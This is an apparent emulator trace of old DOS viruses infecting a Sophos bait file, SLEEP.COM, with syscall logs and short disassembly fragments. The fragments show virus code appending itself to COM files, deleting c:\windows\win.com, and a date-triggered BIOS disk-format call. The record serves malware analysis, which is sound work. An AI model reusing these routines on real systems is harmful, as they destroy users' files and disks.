2018-12-25T12:22:19.984550291Z 61 PC: 14130 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:22:19.993439321Z 87 PC: 1413c | Get or set file date and time
2018-12-25T12:22:19.995155313Z 44 PC: 14146 | Get time 0x14146: mov ah, 0x3f
0x14148: mov cx, 3
0x1414b: lea dx, word ptr [si + 0x13]
0x1414e: int 0x21
0x14150: jb 0x14199
0x14152: cmp ax, 3
0x14155: jne 0x14199
0x14157: mov ax, 0x4202
0x1415a: xor cx, cx
0x1415c: xor dx, dx
0x1415e: int 0x21
0x14160: jb 0x14199
0x14162: mov cx, ax
0x14164: sub ax, 3
0x14167: mov word ptr [si + 0x17], ax
0x1416a: add cx, 0x2bd
0x1416e: mov word ptr [si - 0x1bc], cx
0x14172: mov ah, 0x40
0x14174: mov cx, 0x1e1
0x14177: nop
2018-12-25T12:22:19.997748843Z 63 PC: 14150 | Read file or device (Read 3 bytes on handle 6)
2018-12-25T12:22:20.001147485Z 66 PC: 14160 | Move file pointer
2018-12-25T12:22:20.002975038Z 64 PC: 1417e | Write file or device (Write 481 bytes on handle 6)
2018-12-25T12:22:20.139117176Z 66 PC: 1418d | Move file pointer
2018-12-25T12:22:20.141609709Z 64 PC: 14199 | Write file or device (Write 3 bytes on handle 6)
2018-12-25T12:22:20.145357302Z 87 PC: 141aa | Get or set file date and time
2018-12-25T12:22:20.148087128Z 62 PC: 141ae | Close file
2018-12-25T12:22:20.166617239Z 67 PC: 141b9 | Get or set file attributes
2018-12-25T12:22:20.180285595Z 26 PC: 141c4 | Set disk transfer address
2018-12-25T12:22:20.182596155Z 26 PC: 13e67 | Set disk transfer address
2018-12-25T12:22:20.184966639Z 78 PC: 13ea5 | Find first file
2018-12-25T12:22:20.193130156Z 61 PC: 13eb1 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:22:20.198299689Z 63 PC: 13ec0 | Read file or device (Read 4 bytes on handle 6)
2018-12-25T12:22:20.200445169Z 66 PC: 13ed9 | Move file pointer
2018-12-25T12:22:20.204029584Z 64 PC: 13eee | Write file or device (Write 4 bytes on handle 6)
2018-12-25T12:22:20.208127195Z 64 PC: 13ef9 | Write file or device (Write 481 bytes on handle 6)
2018-12-25T12:22:20.220057061Z 66 PC: 13f02 | Move file pointer
2018-12-25T12:22:20.223279386Z 64 PC: 13f24 | Write file or device (Write 4 bytes on handle 6)
2018-12-25T12:22:20.226898175Z 62 PC: 13e99 | Close file
2018-12-25T12:22:20.237023475Z 79 PC: 13ea5 | Find next file (See above)
2018-12-25T12:22:20.249192239Z 61 PC: 13eb1 | Open file (See above)
2018-12-25T12:22:20.264009107Z 63 PC: 13ec0 | Read file or device (See above)
2018-12-25T12:22:20.271397752Z 66 PC: 13ed9 | Move file pointer (See above)
2018-12-25T12:22:20.274396963Z 64 PC: 13eee | Write file or device (See above)
2018-12-25T12:22:20.277975635Z 64 PC: 13ef9 | Write file or device (See above)
2018-12-25T12:22:20.280948258Z 66 PC: 13f02 | Move file pointer (See above)
2018-12-25T12:22:20.28384655Z 64 PC: 13f24 | Write file or device (See above)
2018-12-25T12:22:20.287669738Z 62 PC: 13e99 | Close file (See above)
2018-12-25T12:22:20.296783043Z 79 PC: 13ea5 | Find next file (See above)
2018-12-25T12:22:20.30018298Z 61 PC: 13eb1 | Open file (See above)
2018-12-25T12:22:20.309364423Z 63 PC: 13ec0 | Read file or device (See above)
2018-12-25T12:22:20.316452994Z 66 PC: 13ed9 | Move file pointer (See above)
2018-12-25T12:22:20.318597879Z 64 PC: 13eee | Write file or device (See above)
2018-12-25T12:22:20.322820176Z 64 PC: 13ef9 | Write file or device (See above)
2018-12-25T12:22:20.331100753Z 66 PC: 13f02 | Move file pointer (See above)
2018-12-25T12:22:20.333310317Z 64 PC: 13f24 | Write file or device (See above)
2018-12-25T12:22:20.339176721Z 62 PC: 13e99 | Close file (See above)
2018-12-25T12:22:20.345843791Z 79 PC: 13ea5 | Find next file (See above)
2018-12-25T12:22:20.352733203Z 61 PC: 13eb1 | Open file (See above)
2018-12-25T12:22:20.36620952Z 63 PC: 13ec0 | Read file or device (See above)
2018-12-25T12:22:20.37516249Z 66 PC: 13ed9 | Move file pointer (See above)
2018-12-25T12:22:20.377089282Z 64 PC: 13eee | Write file or device (See above)
2018-12-25T12:22:20.380922192Z 64 PC: 13ef9 | Write file or device (See above)
2018-12-25T12:22:20.390836722Z 66 PC: 13f02 | Move file pointer (See above)
2018-12-25T12:22:20.392932448Z 64 PC: 13f24 | Write file or device (See above)
2018-12-25T12:22:20.403161828Z 62 PC: 13e99 | Close file (See above)
2018-12-25T12:22:20.413133105Z 79 PC: 13ea5 | Find next file (See above)
2018-12-25T12:22:20.415890356Z 61 PC: 13eb1 | Open file (See above)
2018-12-25T12:22:20.424332412Z 63 PC: 13ec0 | Read file or device (See above)
2018-12-25T12:22:20.432020543Z 66 PC: 13ed9 | Move file pointer (See above)
2018-12-25T12:22:20.434067502Z 64 PC: 13eee | Write file or device (See above)
2018-12-25T12:22:20.438239685Z 64 PC: 13ef9 | Write file or device (See above)
2018-12-25T12:22:20.44753068Z 66 PC: 13f02 | Move file pointer (See above)
2018-12-25T12:22:20.449512781Z 64 PC: 13f24 | Write file or device (See above)
2018-12-25T12:22:20.458421094Z 62 PC: 13e99 | Close file (See above)
2018-12-25T12:22:20.46512816Z 79 PC: 13ea5 | Find next file (See above)
2018-12-25T12:22:20.467257518Z 61 PC: 13eb1 | Open file (See above)
2018-12-25T12:22:20.47417947Z 63 PC: 13ec0 | Read file or device (See above)
2018-12-25T12:22:20.481803657Z 66 PC: 13ed9 | Move file pointer (See above)
2018-12-25T12:22:20.484326356Z 64 PC: 13eee | Write file or device (See above)
2018-12-25T12:22:20.489020379Z 64 PC: 13ef9 | Write file or device (See above)
2018-12-25T12:22:20.497676426Z 66 PC: 13f02 | Move file pointer (See above)
2018-12-25T12:22:20.499828632Z 64 PC: 13f24 | Write file or device (See above)
2018-12-25T12:22:20.509393059Z 62 PC: 13e99 | Close file (See above)
2018-12-25T12:22:20.519140224Z 79 PC: 13ea5 | Find next file (See above)
2018-12-25T12:22:20.522701976Z 61 PC: 13eb1 | Open file (See above)
2018-12-25T12:22:20.531651219Z 63 PC: 13ec0 | Read file or device (See above)
2018-12-25T12:22:20.539047787Z 66 PC: 13ed9 | Move file pointer (See above)
2018-12-25T12:22:20.541050063Z 64 PC: 13eee | Write file or device (See above)
2018-12-25T12:22:20.544849984Z 64 PC: 13ef9 | Write file or device (See above)
2018-12-25T12:22:20.554491861Z 66 PC: 13f02 | Move file pointer (See above)
2018-12-25T12:22:20.556551619Z 64 PC: 13f24 | Write file or device (See above)
2018-12-25T12:22:20.565176971Z 62 PC: 13e99 | Close file (See above)
2018-12-25T12:22:20.57529662Z 79 PC: 13ea5 | Find next file (See above)
2018-12-25T12:22:20.578738269Z 61 PC: 13eb1 | Open file (See above)
2018-12-25T12:22:20.587499531Z 63 PC: 13ec0 | Read file or device (See above)
2018-12-25T12:22:20.595643431Z 66 PC: 13ed9 | Move file pointer (See above)
2018-12-25T12:22:20.597740537Z 64 PC: 13eee | Write file or device (See above)
2018-12-25T12:22:20.60621837Z 64 PC: 13ef9 | Write file or device (See above)
2018-12-25T12:22:20.616412595Z 66 PC: 13f02 | Move file pointer (See above)
2018-12-25T12:22:20.617672046Z 64 PC: 13f24 | Write file or device (See above)
2018-12-25T12:22:20.619702412Z 62 PC: 13e99 | Close file (See above)
2018-12-25T12:22:20.625908549Z 79 PC: 13ea5 | Find next file (See above)
2018-12-25T12:22:20.631864729Z 26 PC: 13e7b | Set disk transfer address
2018-12-25T12:22:20.639955732Z 9 PC: 12a85 | Display string (String= 'Sophos Ltd, Oxford sacrificial COM goat 1400H bytes long ')
2018-12-25T12:22:20.652189037Z 0 PC: 12a89 | Program terminate

{"DateBased":true,"Day":26,"Month":7,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":9008,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:22:18.568807633Z 26 PC: 147b3 | Set disk transfer address
2018-12-25T12:22:18.570992265Z 250 PC: 147bb | UNKNOWN!
2018-12-25T12:22:18.571957799Z 71 PC: 147c6 | Get current directory
2018-12-25T12:22:18.574967904Z 25 PC: 147ca | Get default drive
2018-12-25T12:22:18.576486899Z 78 PC: 147e2 | Find first file
2018-12-25T12:22:18.588827137Z 61 PC: 147f0 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:22:18.608983996Z 66 PC: 14803 | Move file pointer
2018-12-25T12:22:18.610669417Z 62 PC: 148d3 | Close file
2018-12-25T12:22:18.613508741Z 79 PC: 148db | Find next file
2018-12-25T12:22:18.617041089Z 61 PC: 147f0 | Open file (See above)
2018-12-25T12:22:18.623720571Z 66 PC: 14803 | Move file pointer (See above)
2018-12-25T12:22:18.631780638Z 62 PC: 148d3 | Close file (See above)
2018-12-25T12:22:18.633637297Z 79 PC: 148db | Find next file (See above)
2018-12-25T12:22:18.636178125Z 61 PC: 147f0 | Open file (See above)
2018-12-25T12:22:18.643879445Z 66 PC: 14803 | Move file pointer (See above)
2018-12-25T12:22:18.645614764Z 62 PC: 148d3 | Close file (See above)
2018-12-25T12:22:18.647666684Z 79 PC: 148db | Find next file (See above)
2018-12-25T12:22:18.651484793Z 61 PC: 147f0 | Open file (See above)
2018-12-25T12:22:18.658277755Z 66 PC: 14803 | Move file pointer (See above)
2018-12-25T12:22:18.659962014Z 62 PC: 148d3 | Close file (See above)
2018-12-25T12:22:18.662010884Z 79 PC: 148db | Find next file (See above)
2018-12-25T12:22:18.66781092Z 61 PC: 147f0 | Open file (See above)
2018-12-25T12:22:18.674429998Z 66 PC: 14803 | Move file pointer (See above)
2018-12-25T12:22:18.676077244Z 62 PC: 148d3 | Close file (See above)
2018-12-25T12:22:18.678762496Z 79 PC: 148db | Find next file (See above)
2018-12-25T12:22:18.681529042Z 61 PC: 147f0 | Open file (See above)
2018-12-25T12:22:18.688187529Z 66 PC: 14803 | Move file pointer (See above)
2018-12-25T12:22:18.690326901Z 62 PC: 148d3 | Close file (See above)
2018-12-25T12:22:18.692896199Z 79 PC: 148db | Find next file (See above)
2018-12-25T12:22:18.695517098Z 61 PC: 147f0 | Open file (See above)
2018-12-25T12:22:18.702450053Z 66 PC: 14803 | Move file pointer (See above)
2018-12-25T12:22:18.703900218Z 62 PC: 148d3 | Close file (See above)
2018-12-25T12:22:18.705815402Z 79 PC: 148db | Find next file (See above)
2018-12-25T12:22:18.708922955Z 61 PC: 147f0 | Open file (See above)
2018-12-25T12:22:18.715335831Z 66 PC: 14803 | Move file pointer (See above)
2018-12-25T12:22:18.716665103Z 66 PC: 14824 | Move file pointer
2018-12-25T12:22:18.723132794Z 63 PC: 14834 | Read file or device (Read 4 bytes on handle 5)
2018-12-25T12:22:18.731198429Z 62 PC: 148d3 | Close file (See above)
2018-12-25T12:22:18.733228832Z 79 PC: 148db | Find next file (See above)
2018-12-25T12:22:18.736829232Z 59 PC: 148f7 | Change current directory
2018-12-25T12:22:18.740824054Z 62 PC: 148b0 | Close file
2018-12-25T12:22:18.742365052Z 26 PC: 148b7 | Set disk transfer address
2018-12-25T12:22:18.744511234Z 59 PC: 148bf | Change current directory
2018-12-25T12:22:18.748460272Z 26 PC: 145e2 | Set disk transfer address
2018-12-25T12:22:18.749471692Z 71 PC: 14682 | Get current directory
2018-12-25T12:22:18.753035879Z 78 PC: 145f1 | Find first file
2018-12-25T12:22:18.758785251Z 61 PC: 14604 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:22:18.770441601Z 63 PC: 14610 | Read file or device (Read 3 bytes on handle 5)
2018-12-25T12:22:18.77762413Z 66 PC: 14630 | Move file pointer
2018-12-25T12:22:18.779509562Z 64 PC: 1463d | Write file or device (Write 3 bytes on handle 5)
2018-12-25T12:22:18.782360028Z 66 PC: 14648 | Move file pointer
2018-12-25T12:22:18.784139771Z 64 PC: 14655 | Write file or device (Write 465 bytes on handle 5)
2018-12-25T12:22:18.798706963Z 62 PC: 14659 | Close file
2018-12-25T12:22:18.806495826Z 59 PC: 14661 | Change current directory
2018-12-25T12:22:18.810748086Z 65 PC: 1468e | Delete file (Filename = 'c:\windows\win.com')
2018-12-25T12:22:19.154180883Z 59 PC: 1466e | Change current directory
2018-12-25T12:22:19.155980908Z 26 PC: 14677 | Set disk transfer address
2018-12-25T12:22:19.157239247Z 71 PC: 1441e | Get current directory
2018-12-25T12:22:19.161612605Z 26 PC: 1443d | Set disk transfer address
2018-12-25T12:22:19.162743443Z 78 PC: 14447 | Find first file
2018-12-25T12:22:19.169654744Z 61 PC: 1455c | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:22:19.179200903Z 63 PC: 1456b | Read file or device (Read 4 bytes on handle 5)
2018-12-25T12:22:19.186005383Z 61 PC: 14471 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:22:19.19267474Z 63 PC: 14480 | Read file or device (Read 3 bytes on handle 6)
2018-12-25T12:22:19.196571398Z 66 PC: 1448b | Move file pointer
2018-12-25T12:22:19.197911114Z 44 PC: 14491 | Get time 0x14491: inc dl
0x14493: mov byte ptr [bp + 0x2d9], dl
0x14497: pushaw
0x14498: call 0x243f2
0x1449b: popaw
0x1449c: mov byte ptr [bp + 0x330], 0xe9
0x144a1: mov ax, word ptr [bp + 0x34e]
0x144a5: sub ax, 3
0x144a8: mov word ptr [bp + 0x331], ax
0x144ac: mov word ptr [bp + 0x333], 0x60
0x144b2: mov ah, 0x40
0x144b4: mov cx, 4
0x144b7: lea dx, word ptr [bp + 0x330]
0x144bb: int 0x21
0x144bd: mov ax, 0x4202
0x144c0: xor cx, cx
0x144c2: xor dx, dx
0x144c4: int 0x21
0x144c6: mov ah, 0x40
0x144c8: mov cx, 0x1d6
2018-12-25T12:22:19.200333533Z 64 PC: 144bd | Write file or device (Write 4 bytes on handle 6)
2018-12-25T12:22:19.204075243Z 66 PC: 144c6 | Move file pointer
2018-12-25T12:22:19.205767341Z 64 PC: 144d1 | Write file or device (Write 470 bytes on handle 6)
2018-12-25T12:22:19.213966606Z 42 PC: 144da | Get date 0x144da: cmp dx, 0x71a
0x144de: je 0x1453f
0x144e0: cmp dx, 0xc06
0x144e4: je 0x1453f
0x144e6: lea dx, word ptr [bp + 0x29f]
0x144ea: mov ah, 0x3b
0x144ec: int 0x21
0x144ee: jb 0x144f3
0x144f0: jmp 0x1443d
0x144f3: mov ax, 0x5701
0x144f6: mov dx, word ptr [bp + 0x326]
0x144fa: mov cx, word ptr [bp + 0x324]
0x144fe: int 0x21
0x14500: mov ah, 0x3e
0x14502: int 0x21
0x14504: mov ax, 0x4301
0x14507: lea dx, word ptr [bp + 0x352]
0x1450b: xor ch, ch
0x1450d: mov cl, byte ptr [bp + 0x323]
0x14511: int 0x21
2018-12-25T12:22:19.217277383Z 64 PC: 1454f | Write file or device (Write 44 bytes on handle 1)
2018-12-25T12:22:19.221985222Z 87 PC: 14500 | Get or set file date and time
2018-12-25T12:22:19.223787437Z 62 PC: 14504 | Close file
2018-12-25T12:22:19.232459909Z 67 PC: 14513 | Get or set file attributes
2018-12-25T12:22:19.242230335Z 59 PC: 1451b | Change current directory
2018-12-25T12:22:19.245958617Z 26 PC: 14527 | Set disk transfer address
2018-12-25T12:22:19.24795504Z 37 PC: 14268 | Set interrupt vector (Interrupt = '1' AKA 'Character input')
2018-12-25T12:22:19.249132056Z 37 PC: 1426c | Set interrupt vector (Interrupt = '3' AKA 'Auxiliary input')
2018-12-25T12:22:19.250248326Z 26 PC: 14274 | Set disk transfer address
2018-12-25T12:22:19.251510049Z 71 PC: 14281 | Get current directory
2018-12-25T12:22:19.254971431Z 42 PC: 14286 | Get date 0x14286: cmp dl, 6
0x14289: jne 0x142ad
0x1428b: mov ax, 0x500
0x1428e: mov cx, 0
0x14291: mov dh, 0
0x14293: mov dl, 0x80
0x14295: int 0x13
0x14297: jb 0x1425a
0x14299: mov ah, 9
0x1429b: lea dx, word ptr [si + 0x27d]
0x1429f: int 0x21
0x142a1: nop
0x142a2: jmp 0x142a1
0x142a4: mov cx, 0x4eb
0x142a7: jmp 0x142a5
0x142a9: cli
0x142aa: jmp 0x142a0
0x142ac: iret
0x142ad: lea dx, word ptr [si + 0x25c]
0x142b1: xor cx, cx
2018-12-25T12:22:19.257051339Z 78 PC: 142b7 | Find first file
2018-12-25T12:22:19.263056642Z 61 PC: 142c2 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:22:19.270627636Z 63 PC: 142d1 | Read file or device (Read 3 bytes on handle 6)
2018-12-25T12:22:19.273470506Z 87 PC: 142ec | Get or set file date and time
2018-12-25T12:22:19.275247495Z 66 PC: 142fc | Move file pointer
2018-12-25T12:22:19.27787961Z 63 PC: 14305 | Read file or device (Read 2 bytes on handle 6)
2018-12-25T12:22:19.284767171Z 44 PC: 1430f | Get time 0x1430f: or dx, dx
0x14311: je 0x1430b
0x14313: mov word ptr [si + 0x2df], dx
0x14317: xor dx, dx
0x14319: xor cx, cx
0x1431b: mov ax, 0x4202
0x1431e: int 0x21
0x14320: or dx, dx
0x14322: jne 0x142d6
0x14324: cmp ah, 0xfe
0x14327: jae 0x142d6
0x14329: call 0x24240
0x1432c: mov ax, 0x4200
0x1432f: xor cx, cx
0x14331: mov dx, 1
0x14334: int 0x21
0x14336: mov ah, 0x40
0x14338: lea dx, word ptr [si + 0x2e4]
0x1433c: mov cx, 2
0x1433f: int 0x21
2018-12-25T12:22:19.287202668Z 66 PC: 14320 | Move file pointer
2018-12-25T12:22:19.290093672Z 64 PC: 14252 | Write file or device (Write 476 bytes on handle 6)
2018-12-25T12:22:19.298465694Z 66 PC: 14336 | Move file pointer
2018-12-25T12:22:19.300247374Z 64 PC: 14341 | Write file or device (Write 2 bytes on handle 6)
2018-12-25T12:22:19.303697321Z 87 PC: 14348 | Get or set file date and time
2018-12-25T12:22:19.305171902Z 62 PC: 1434c | Close file
2018-12-25T12:22:19.313051338Z 59 PC: 14354 | Change current directory
2018-12-25T12:22:19.315744426Z 26 PC: 1435b | Set disk transfer address
2018-12-25T12:22:19.316823057Z 48 PC: 1404a | Get DOS version
2018-12-25T12:22:19.317985473Z 47 PC: 14056 | Get disk transfer address
2018-12-25T12:22:19.319981942Z 26 PC: 14063 | Set disk transfer address
2018-12-25T12:22:19.321149826Z 78 PC: 140d6 | Find first file
2018-12-25T12:22:19.327292919Z 67 PC: 1411a | Get or set file attributes
2018-12-25T12:22:19.333793376Z 67 PC: 14128 | Get or set file attributes
2018-12-25T12:22:19.343859279Z 61 PC: 14130 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:22:19.350465208Z 87 PC: 1413c | Get or set file date and time
2018-12-25T12:22:19.352266518Z 44 PC: 14146 | Get time 0x14146: mov ah, 0x3f
0x14148: mov cx, 3
0x1414b: lea dx, word ptr [si + 0x13]
0x1414e: int 0x21
0x14150: jb 0x14199
0x14152: cmp ax, 3
0x14155: jne 0x14199
0x14157: mov ax, 0x4202
0x1415a: xor cx, cx
0x1415c: xor dx, dx
0x1415e: int 0x21
0x14160: jb 0x14199
0x14162: mov cx, ax
0x14164: sub ax, 3
0x14167: mov word ptr [si + 0x17], ax
0x1416a: add cx, 0x2bd
0x1416e: mov word ptr [si - 0x1bc], cx
0x14172: mov ah, 0x40
0x14174: mov cx, 0x1e1
0x14177: nop
2018-12-25T12:22:19.355355973Z 63 PC: 14150 | Read file or device (Read 3 bytes on handle 6)
2018-12-25T12:22:19.358124536Z 66 PC: 14160 | Move file pointer
2018-12-25T12:22:19.359854661Z 64 PC: 1417e | Write file or device (Write 481 bytes on handle 6)
2018-12-25T12:22:19.368693508Z 66 PC: 1418d | Move file pointer
2018-12-25T12:22:19.370317632Z 64 PC: 14199 | Write file or device (Write 3 bytes on handle 6)
2018-12-25T12:22:19.374144557Z 87 PC: 141aa | Get or set file date and time
2018-12-25T12:22:19.376789476Z 62 PC: 141ae | Close file
2018-12-25T12:22:19.385832213Z 67 PC: 141b9 | Get or set file attributes
2018-12-25T12:22:19.399399557Z 26 PC: 141c4 | Set disk transfer address
2018-12-25T12:22:19.401704125Z 26 PC: 13e67 | Set disk transfer address
2018-12-25T12:22:19.403076032Z 78 PC: 13ea5 | Find first file
2018-12-25T12:22:19.409553185Z 61 PC: 13eb1 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:22:19.416874413Z 63 PC: 13ec0 | Read file or device (Read 4 bytes on handle 6)
2018-12-25T12:22:19.419974313Z 66 PC: 13ed9 | Move file pointer
2018-12-25T12:22:19.421628791Z 64 PC: 13eee | Write file or device (Write 4 bytes on handle 6)
2018-12-25T12:22:19.426196317Z 64 PC: 13ef9 | Write file or device (Write 481 bytes on handle 6)
2018-12-25T12:22:19.434290527Z 66 PC: 13f02 | Move file pointer
2018-12-25T12:22:19.435920526Z 64 PC: 13f24 | Write file or device (Write 4 bytes on handle 6)
2018-12-25T12:22:19.439434737Z 62 PC: 13e99 | Close file
2018-12-25T12:22:19.447727096Z 79 PC: 13ea5 | Find next file (See above)
2018-12-25T12:22:19.451059395Z 61 PC: 13eb1 | Open file (See above)
2018-12-25T12:22:19.458098928Z 63 PC: 13ec0 | Read file or device (See above)
2018-12-25T12:22:19.464340862Z 66 PC: 13ed9 | Move file pointer (See above)
2018-12-25T12:22:19.465719454Z 64 PC: 13eee | Write file or device (See above)
2018-12-25T12:22:19.469512412Z 64 PC: 13ef9 | Write file or device (See above)
2018-12-25T12:22:19.473090625Z 66 PC: 13f02 | Move file pointer (See above)
2018-12-25T12:22:19.474909839Z 64 PC: 13f24 | Write file or device (See above)
2018-12-25T12:22:19.478077117Z 62 PC: 13e99 | Close file (See above)
2018-12-25T12:22:19.487002431Z 79 PC: 13ea5 | Find next file (See above)
2018-12-25T12:22:19.490063538Z 61 PC: 13eb1 | Open file (See above)
2018-12-25T12:22:19.496863056Z 63 PC: 13ec0 | Read file or device (See above)
2018-12-25T12:22:19.504466051Z 66 PC: 13ed9 | Move file pointer (See above)
2018-12-25T12:22:19.506161214Z 64 PC: 13eee | Write file or device (See above)
2018-12-25T12:22:19.509064048Z 64 PC: 13ef9 | Write file or device (See above)
2018-12-25T12:22:19.51861647Z 66 PC: 13f02 | Move file pointer (See above)
2018-12-25T12:22:19.519952386Z 64 PC: 13f24 | Write file or device (See above)
2018-12-25T12:22:19.526281748Z 62 PC: 13e99 | Close file (See above)
2018-12-25T12:22:19.536254452Z 79 PC: 13ea5 | Find next file (See above)
2018-12-25T12:22:19.539145028Z 61 PC: 13eb1 | Open file (See above)
2018-12-25T12:22:19.545738478Z 63 PC: 13ec0 | Read file or device (See above)
2018-12-25T12:22:19.553064095Z 66 PC: 13ed9 | Move file pointer (See above)
2018-12-25T12:22:19.555044077Z 64 PC: 13eee | Write file or device (See above)
2018-12-25T12:22:19.557759618Z 64 PC: 13ef9 | Write file or device (See above)
2018-12-25T12:22:19.566725568Z 66 PC: 13f02 | Move file pointer (See above)
2018-12-25T12:22:19.568301119Z 64 PC: 13f24 | Write file or device (See above)
2018-12-25T12:22:19.574783727Z 62 PC: 13e99 | Close file (See above)
2018-12-25T12:22:19.584096585Z 79 PC: 13ea5 | Find next file (See above)
2018-12-25T12:22:19.586748979Z 61 PC: 13eb1 | Open file (See above)
2018-12-25T12:22:19.593165776Z 63 PC: 13ec0 | Read file or device (See above)
2018-12-25T12:22:19.600174461Z 66 PC: 13ed9 | Move file pointer (See above)
2018-12-25T12:22:19.601863675Z 64 PC: 13eee | Write file or device (See above)
2018-12-25T12:22:19.604780676Z 64 PC: 13ef9 | Write file or device (See above)
2018-12-25T12:22:19.613372818Z 66 PC: 13f02 | Move file pointer (See above)
2018-12-25T12:22:19.615125918Z 64 PC: 13f24 | Write file or device (See above)
2018-12-25T12:22:19.622372779Z 62 PC: 13e99 | Close file (See above)
2018-12-25T12:22:19.6322192Z 79 PC: 13ea5 | Find next file (See above)
2018-12-25T12:22:19.635404363Z 61 PC: 13eb1 | Open file (See above)
2018-12-25T12:22:19.642092788Z 63 PC: 13ec0 | Read file or device (See above)
2018-12-25T12:22:19.649394317Z 66 PC: 13ed9 | Move file pointer (See above)
2018-12-25T12:22:19.65215332Z 64 PC: 13eee | Write file or device (See above)
2018-12-25T12:22:19.6551048Z 64 PC: 13ef9 | Write file or device (See above)
2018-12-25T12:22:19.664035344Z 66 PC: 13f02 | Move file pointer (See above)
2018-12-25T12:22:19.666058323Z 64 PC: 13f24 | Write file or device (See above)
2018-12-25T12:22:19.672720939Z 62 PC: 13e99 | Close file (See above)
2018-12-25T12:22:19.681738914Z 79 PC: 13ea5 | Find next file (See above)
2018-12-25T12:22:19.684851334Z 61 PC: 13eb1 | Open file (See above)
2018-12-25T12:22:19.69143801Z 63 PC: 13ec0 | Read file or device (See above)
2018-12-25T12:22:19.698089448Z 66 PC: 13ed9 | Move file pointer (See above)
2018-12-25T12:22:19.700561947Z 64 PC: 13eee | Write file or device (See above)
2018-12-25T12:22:19.703445438Z 64 PC: 13ef9 | Write file or device (See above)
2018-12-25T12:22:19.711304823Z 66 PC: 13f02 | Move file pointer (See above)
2018-12-25T12:22:19.71387676Z 64 PC: 13f24 | Write file or device (See above)
2018-12-25T12:22:19.720870815Z 62 PC: 13e99 | Close file (See above)
2018-12-25T12:22:19.729076816Z 79 PC: 13ea5 | Find next file (See above)
2018-12-25T12:22:19.73283248Z 61 PC: 13eb1 | Open file (See above)
2018-12-25T12:22:19.739406821Z 63 PC: 13ec0 | Read file or device (See above)
2018-12-25T12:22:19.745855203Z 66 PC: 13ed9 | Move file pointer (See above)
2018-12-25T12:22:19.748087859Z 64 PC: 13eee | Write file or device (See above)
2018-12-25T12:22:19.755165247Z 64 PC: 13ef9 | Write file or device (See above)
2018-12-25T12:22:19.762969646Z 66 PC: 13f02 | Move file pointer (See above)
2018-12-25T12:22:19.765552274Z 64 PC: 13f24 | Write file or device (See above)
2018-12-25T12:22:19.768498986Z 62 PC: 13e99 | Close file (See above)
2018-12-25T12:22:19.776652169Z 79 PC: 13ea5 | Find next file (See above)
2018-12-25T12:22:19.779659339Z 26 PC: 13e7b | Set disk transfer address
2018-12-25T12:22:19.780780112Z 9 PC: 12a85 | Display string (String= 'Sophos Ltd, Oxford sacrificial COM goat 1400H bytes long ')
2018-12-25T12:22:19.787901976Z 0 PC: 12a89 | Program terminate

{"DateBased":true,"Day":6,"Month":12,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":9008,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:22:18.753430685Z 26 PC: 147b3 | Set disk transfer address
2018-12-25T12:22:18.756281236Z 250 PC: 147bb | UNKNOWN!
2018-12-25T12:22:18.7575977Z 71 PC: 147c6 | Get current directory
2018-12-25T12:22:18.761181972Z 25 PC: 147ca | Get default drive
2018-12-25T12:22:18.763375727Z 78 PC: 147e2 | Find first file
2018-12-25T12:22:18.770105087Z 61 PC: 147f0 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:22:18.777279635Z 66 PC: 14803 | Move file pointer
2018-12-25T12:22:18.784440013Z 62 PC: 148d3 | Close file
2018-12-25T12:22:18.786313787Z 79 PC: 148db | Find next file
2018-12-25T12:22:18.788066008Z 61 PC: 147f0 | Open file (See above)
2018-12-25T12:22:18.792150099Z 66 PC: 14803 | Move file pointer (See above)
2018-12-25T12:22:18.793550037Z 62 PC: 148d3 | Close file (See above)
2018-12-25T12:22:18.795308848Z 79 PC: 148db | Find next file (See above)
2018-12-25T12:22:18.798350766Z 61 PC: 147f0 | Open file (See above)
2018-12-25T12:22:18.811590312Z 66 PC: 14803 | Move file pointer (See above)
2018-12-25T12:22:18.813863834Z 62 PC: 148d3 | Close file (See above)
2018-12-25T12:22:18.816226723Z 79 PC: 148db | Find next file (See above)
2018-12-25T12:22:18.820640917Z 61 PC: 147f0 | Open file (See above)
2018-12-25T12:22:18.827862756Z 66 PC: 14803 | Move file pointer (See above)
2018-12-25T12:22:18.829334986Z 62 PC: 148d3 | Close file (See above)
2018-12-25T12:22:18.832107876Z 79 PC: 148db | Find next file (See above)
2018-12-25T12:22:18.834797013Z 61 PC: 147f0 | Open file (See above)
2018-12-25T12:22:18.839564024Z 66 PC: 14803 | Move file pointer (See above)
2018-12-25T12:22:18.842064536Z 62 PC: 148d3 | Close file (See above)
2018-12-25T12:22:18.844873881Z 79 PC: 148db | Find next file (See above)
2018-12-25T12:22:18.848158411Z 61 PC: 147f0 | Open file (See above)
2018-12-25T12:22:18.854470398Z 66 PC: 14803 | Move file pointer (See above)
2018-12-25T12:22:18.856013599Z 62 PC: 148d3 | Close file (See above)
2018-12-25T12:22:18.857814292Z 79 PC: 148db | Find next file (See above)
2018-12-25T12:22:18.860546414Z 61 PC: 147f0 | Open file (See above)
2018-12-25T12:22:18.867788097Z 66 PC: 14803 | Move file pointer (See above)
2018-12-25T12:22:18.869301432Z 62 PC: 148d3 | Close file (See above)
2018-12-25T12:22:18.871049371Z 79 PC: 148db | Find next file (See above)
2018-12-25T12:22:18.873991808Z 61 PC: 147f0 | Open file (See above)
2018-12-25T12:22:18.881295499Z 66 PC: 14803 | Move file pointer (See above)
2018-12-25T12:22:18.883965612Z 66 PC: 14824 | Move file pointer
2018-12-25T12:22:18.886758216Z 63 PC: 14834 | Read file or device (Read 4 bytes on handle 5)
2018-12-25T12:22:18.893739552Z 62 PC: 148d3 | Close file (See above)
2018-12-25T12:22:18.895684795Z 79 PC: 148db | Find next file (See above)
2018-12-25T12:22:18.898964802Z 59 PC: 148f7 | Change current directory
2018-12-25T12:22:18.90416511Z 62 PC: 148b0 | Close file
